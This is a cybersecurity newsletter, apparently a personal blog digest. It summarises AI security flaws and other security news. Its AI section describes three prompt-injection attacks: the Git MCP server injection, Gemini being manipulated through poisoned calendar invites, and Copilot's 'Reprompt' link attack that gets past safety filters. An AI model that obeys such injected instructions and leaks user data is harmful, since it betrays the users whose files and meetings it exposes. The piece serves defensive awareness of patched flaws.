Hi, I'm Vivian, a cybersecurity and AI Product Manager trying to keep up with an industry that moves faster than I can whisk up my morning matcha. Every week brings a new wave of vulnerabilities, AI security mishaps, and breaches that keep us on our toes, so I take some time to share the most interesting news instead of letting it all blur together. Let's dive into what kept us up at night recently in cybersecurity and AI security.
AI Research & Vulnerabilities:
Remote Code Execution in Anthropic's Git MCP Server
Three critical vulnerabilities were discovered in Anthropic's official Git Model Context Protocol server that enable remote code execution through prompt injection. The flaws stem from insufficient path validation and argument injection in tools like git_init and git_diff, allowing attackers to manipulate AI assistants into reading sensitive files, deleting data, or executing arbitrary commands when chained with standard filesystem capabilities. Version 2025.12.18 patches these vulnerabilities.
Google Gemini Vulnerability Exploited via Calendar Invites
Researchers disclosed a vulnerability in Google Gemini that allowed data exfiltration through malicious Google Calendar invitations. The attack worked as an indirect prompt injection where instructions were embedded in calendar invite descriptions. When users asked Gemini about their schedule, the AI would process the poisoned entry and execute hidden commands to summarize private meeting details and copy them into new events visible to the attacker. The exploit bypassed standard security controls by manipulating the model's contextual understanding without requiring link clicks or new permissions.
Single-Click Data Theft Vulnerability in Microsoft Copilot
A critical vulnerability called Reprompt was found in Microsoft Copilot Personal that enabled data exfiltration via a single malicious link. The attack exploited a prompt injection flaw in the URL parameter, forcing the AI to execute hidden instructions immediately upon loading. Using a double-request technique to bypass safety filters, the exploit could silently extract file access history, location data, and conversation logs without further user interaction, persisting even after the browser tab was closed. Microsoft has patched the issue, and enterprise versions were not affected.
AI News:
OpenAI Implements Behavioral Age Prediction for Teen Safety
OpenAI rolled out an age prediction model for ChatGPT consumer plans that analyzes behavioral signals like usage patterns, activity times, and account longevity to estimate if users are under 18. The system automatically applies stricter safety protocols for potential minors, including filtering graphic violence, sexual roleplay, and content promoting unhealthy beauty standards. Users incorrectly flagged can restore full access through identity verification. The initiative aims to prevent age falsification during signup.
OpenAI Launches Standalone Translation Tool
OpenAI quietly released a web-based translation service for instant text conversion. The tool allows users to adjust translation tone with presets like business formal or simplified for children, and permits transition into full AI conversations for complex follow-up queries. Currently lacks multimedia features like image or document translation but is available free to all users. Represents a shift toward consumer-facing utility products.
Google Gemini "Personal Intelligence" Accesses Private Data
Google launched Personal Intelligence for its Gemini app, allowing the AI assistant to access and cross-reference data from Gmail, Google Photos, YouTube, and Search history for personalized responses. This enables complex tasks like finding a vehicle's license plate from a photo while retrieving its maintenance history from emails, or planning vacations based on past travel preferences. Competes directly with other memory-enabled AI assistants by leveraging Google's user data ecosystem.
Cybersecurity News:
LinkedIn Phishing Campaign Uses Comment Replies
Scammers are exploiting LinkedIn with fraudulent comment replies that impersonate platform support using fake company pages and official branding. These automated comments claim user accounts have been restricted for policy violations and urge victims to visit external links, sometimes masked by LinkedIn's own lnkd.in shortener. Links redirect to credential harvesting sites that exploit user trust in platform notifications and official URL structures.
"WhisperPair" Vulnerabilities Expose Bluetooth Headphones
A vulnerability called WhisperPair was discovered in Google Fast Pair implementation used by popular Bluetooth audio accessories. The flaws let attackers within radio range bypass pairing authentication and force connections without user interaction. This unauthorized access enables audio stream hijacking to eavesdrop via microphones, inject malicious commands, or track victim locations using the Google Find My Device network if the accessory hasn't been previously paired with an Android device.
Malicious Chrome Extensions Target Enterprise HR and ERP Systems
Five malicious Chrome extensions were identified that hijack user sessions on enterprise platforms like Workday, NetSuite, and SuccessFactors. Disguised as productivity tools or administrative safeguards, the extensions exfiltrate authentication cookies to remote servers, block access to security settings, and inject stolen tokens for account takeover. The malware specifically targets and blocks incident response capabilities like password changes and audit log access, locking administrators out of their own security controls.
North Korean Hackers Weaponize Visual Studio Code
An evolution in the Contagious Interview campaign attributed to North Korean threat actors now abuses the task configuration feature in Visual Studio Code to execute malicious code. Attackers trick developers into downloading malicious repositories under the pretense of job interviews or technical assignments. Once the repository is trusted in VS Code, the tasks.json file automatically executes a background command that fetches and runs a JavaScript payload, planting a backdoor for remote access without alerting the user.
That's all for now… Stay informed and protected.